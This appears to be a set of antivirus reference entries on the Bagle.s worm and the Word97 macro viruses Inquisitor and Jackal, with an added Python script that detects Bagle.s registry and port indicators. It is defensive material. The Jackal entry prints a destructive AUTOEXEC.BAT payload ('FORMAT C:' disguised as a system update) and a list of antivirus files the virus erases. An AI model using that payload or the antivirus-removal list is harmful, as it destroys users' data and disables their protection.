I-Worm.Bagle.s
Description I-Worm.Bagle.s
Bagle.s is an Internet worm that spreads as an attachment to infected emails. The worm is a PE EXE file about 8 KB in size. Bagle.s is compressed with FSG, and the unpacked file is about 37 KB in size.

Infected messages have the following characteristics:
Sender address: random
Subject: none
Body: empty
Attachment name: random characters
Attachment file type: .exe

Installation
After launch, Bagle.s copies itself into the Windows system directory as gigabit.exe and registers this file in the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gigabit.exe" = "%system%\gigabit.exe"
Bagle.s then creates the key:
[SOFTWARE\Windows2004]
"gsed"
where it stores its variables. Bagle.s also launches mshearts.exe - The Microsoft Hearts Network.
Finally, Bagle.s attempts to connect to several remote sites and store ID information from the infected machine on these sites.

Propagation
Bagle.s searches disks for files with the following extensions:
adb asp cfg cgi dbx dhtm eml htm jsp mbx mdx mht mmf msg nch ods oft php pl sht shtm stm tbb txt uin wab wsh xls xml
and sends copies of itself to all email addresses found in these files, using a built-in SMTP engine.

Remote Administration
Bagle.s opens and monitors port 4751. The built-in backdoor function allows the master to:
Execute commands
Download files
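The following Python check is an added example, not part of the original description or of any vendor tool. It parses `reg export` text and `netstat -ano` output and reports the Bagle.s indicators listed above: the gigabit.exe autorun value, the Windows2004 key and a listener on port 4751. The sample inputs are constructed, and the hive shown for the Windows2004 key is an assumption because the description does not name one.

```python
import re

# Indicators taken from the Bagle.s description above.
RUN_KEY = r"\software\microsoft\windows\currentversion\run"
WORM_KEY = r"\software\windows2004"
BACKDOOR_PORT = 4751

# Constructed sample inputs (the HKCU hive for Windows2004 is an assumption).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gigabit.exe"="C:\\WINDOWS\\system32\\gigabit.exe"
[HKEY_CURRENT_USER\SOFTWARE\Windows2004]
"gsed"=hex:01,02
'''
SAMPLE_NETSTAT = """  Proto  Local Address   Foreign Address  State      PID
  TCP    0.0.0.0:135     0.0.0.0:0        LISTENING  880
  TCP    0.0.0.0:4751    0.0.0.0:0        LISTENING  1532
"""

def parse_reg_export(text):
    """Parse .reg export text into {key_path: {value_name: data}}."""
    keys, current = {}, None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1], {})
        elif current is not None:
            m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
            if m:  # string data is unquoted and un-escaped; other types kept raw
                current[m.group(1)] = m.group(2).strip('"').replace("\\\\", "\\")
    return keys

def listening_ports(netstat_text):
    """Local TCP ports in LISTENING state, from `netstat -ano` text."""
    rows = (l.split() for l in netstat_text.splitlines())
    return {int(f[1].rsplit(":", 1)[1]) for f in rows
            if len(f) >= 4 and f[0] == "TCP" and f[3] == "LISTENING"}

def bagle_s_findings(reg_text, netstat_text):
    findings = []
    for key, values in parse_reg_export(reg_text).items():
        k = key.lower()
        for name, data in values.items():
            # Match on the value name or on the file name the value points to.
            if k.endswith(RUN_KEY) and "gigabit.exe" in (name.lower(), data.lower().rsplit("\\", 1)[-1]):
                findings.append(f"autorun entry: {key} -> {data}")
        if (k + "\\").find(WORM_KEY + "\\") != -1:
            findings.append(f"worm state key present: {key}")
    if BACKDOOR_PORT in listening_ports(netstat_text):
        findings.append(f"listener on TCP port {BACKDOOR_PORT}")
    return findings
```

A listener on port 4751 or a Windows2004 key alone is a weak signal; treat a host as a likely match when the autorun entry appears together with either of them.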
Macro.Word97.Inquisitor
Description Macro.Word97.Inquisitor
This virus contains seven macros in a single module, "Module1": AutoOpen, Inquisitor97, n, a, ToolsMacro, ViewVBCode, Payload. The virus replicates when documents are opened. Depending on a system random counter, or when the user enters the Tools/Macro menu item, the virus replaces every "e" character with "s" in the current document. On entering Tools/Macro the virus also displays the MessageBox:
You have been infected by Inquisitor97
Macro.Word97.Jackal
Description Macro.Word97.Jackal
This virus contains one module, "Jackal", which contains fourteen macros: AutoOpen, FileSaveAs, KillAV, Format, ToolsMacro, ViewVBCode, FileTemplates, Organizer, EditFind, HelpAbout, ToolsCustomize, ToolsOptions, Jackal, Ultras. The virus replicates when files are opened or saved under a new name. It erases files belonging to popular anti-virus applications:
C:\Program Files\AntiViral Toolkit Pro\Avp32.exe
C:\Program Files\AntiViral Toolkit Pro\*.avc
C:\Program Files\Command Software\F-PROT95\*.dll
C:\Program Files\Command Software\F-PROT95\*.exe
C:\Program Files\McAfee\VirusScan95\Scan.dat
C:\Program Files\McAfee\VirusScan\Scan.dat
C:\Program Files\Norton AntiVirus\Viruscan.dat
C:\Program Files\Symantec\Symevnt.386
C:\Program Files\FindVirus\Findviru.drv
C:\Program Files\Cheyenne\AntiVirus\*.dll
C:\Program Files\Cheyenne\Common\Cshell.dll
C:\PC-Cillin 95\Lpt$vpn.*
C:\PC-Cillin 95\Scan32.dll
C:\PC-Cillin 97\Lpt$vpn.*
C:\PC-Cillin 97\Scan32.dll
C:\eSafe\Protect\*.dll
C:\f-macro\f-macro.exe
C:\TBAVW95\Tbscan.sig
C:\Tbavw95\Tb*.*
C:\VS95\*.dll

On the 1st of any month it sets the password "JACKAL" in documents. On the 27th of any month it sets the password "ULTRAS". On days 5, 9, 17 and 25, and during May, it displays the balloon:
Microsoft Office 97 Error, is necessary will update files

It then appends to the C:\AUTOEXEC.BAT file commands that format the disk:
@ECHO OFF
CLS
ECHO Microsoft Corp. 1983-1997 All rights reserved
ECHO Goes preparation to renovation of your system files
ECHO Please wait this can occupy several minutes
FORMAT C: /U /C /S /AUTOTEST > NUL
ECHO.
ECHO.
ECHO.
ECHO Error at renovations of files

On the 15th and 30th of any month it deletes the files:
C:\*.*
C:\Windows\*.*
C:\Windows\System\*.*